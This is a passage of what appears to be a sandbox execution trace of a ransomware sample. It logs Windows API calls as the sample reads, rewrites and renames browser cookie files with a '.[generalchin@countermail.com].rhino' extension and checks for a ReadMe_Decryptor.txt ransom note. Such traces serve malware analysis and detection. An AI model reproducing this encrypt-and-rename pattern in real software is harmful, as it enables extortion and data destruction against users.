lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xce, lpOverlapped=0x0) returned 1 [0089.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.921] GetLastError () returned 0x0 [0089.921] SetLastError (dwErrCode=0x0) [0089.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.921] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xce) returned 0x75d698 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0198 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02a0 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.922] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0198 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1ee) returned 0x23b0428 [0089.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.923] WriteFile (in: hFile=0xec, lpBuffer=0x23b0428*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0428*, lpNumberOfBytesWritten=0x2cfa04*=0x1ee, lpOverlapped=0x0) returned 1 [0089.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.924] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1ee, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.924] CloseHandle (hObject=0xec) returned 1 [0089.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0198 [0089.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x23b0428 [0089.925] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.925] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0089.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0089.936] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.936] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.936] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.937] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x6c [0089.937] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18c, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.937] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.937] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.939] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.940] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x6c, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x6c, lpOverlapped=0x0) returned 1 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.940] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.940] GetLastError () returned 0x0 [0089.940] SetLastError (dwErrCode=0x0) [0089.940] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6c) returned 0x72a920 [0089.940] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00f0 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01f8 [0089.940] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.940] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.940] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.941] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.942] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b00f0 [0089.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.942] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18c) returned 0x23b0380 [0089.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.942] WriteFile (in: hFile=0xec, lpBuffer=0x23b0380*, nNumberOfBytesToWrite=0x18c, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0380*, lpNumberOfBytesWritten=0x2cfa04*=0x18c, lpOverlapped=0x0) returned 1 [0089.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0089.942] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.942] CloseHandle (hObject=0xec) returned 1 [0089.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00f0 [0089.943] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x23b0380 [0089.943] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.943] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0089.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01f8 | out: hHeap=0x6d0000) returned 1 [0089.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.944] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.944] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.945] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x68 [0089.945] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x188, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.945] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.945] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.946] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.947] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x68, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x68, lpOverlapped=0x0) returned 1 [0089.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.947] GetLastError () returned 0x0 [0089.947] SetLastError (dwErrCode=0x0) [0089.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x68) returned 0x72a920 [0089.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0198 [0089.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02a0 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.948] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b0048 [0089.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x188) returned 0x23b0428 [0089.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.949] WriteFile (in: hFile=0xec, lpBuffer=0x23b0428*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0428*, lpNumberOfBytesWritten=0x2cfa04*=0x188, lpOverlapped=0x0) returned 1 [0089.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.949] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x188, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.949] CloseHandle (hObject=0xec) returned 1 [0089.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0428 [0089.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.950] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0089.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.952] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.952] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.952] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 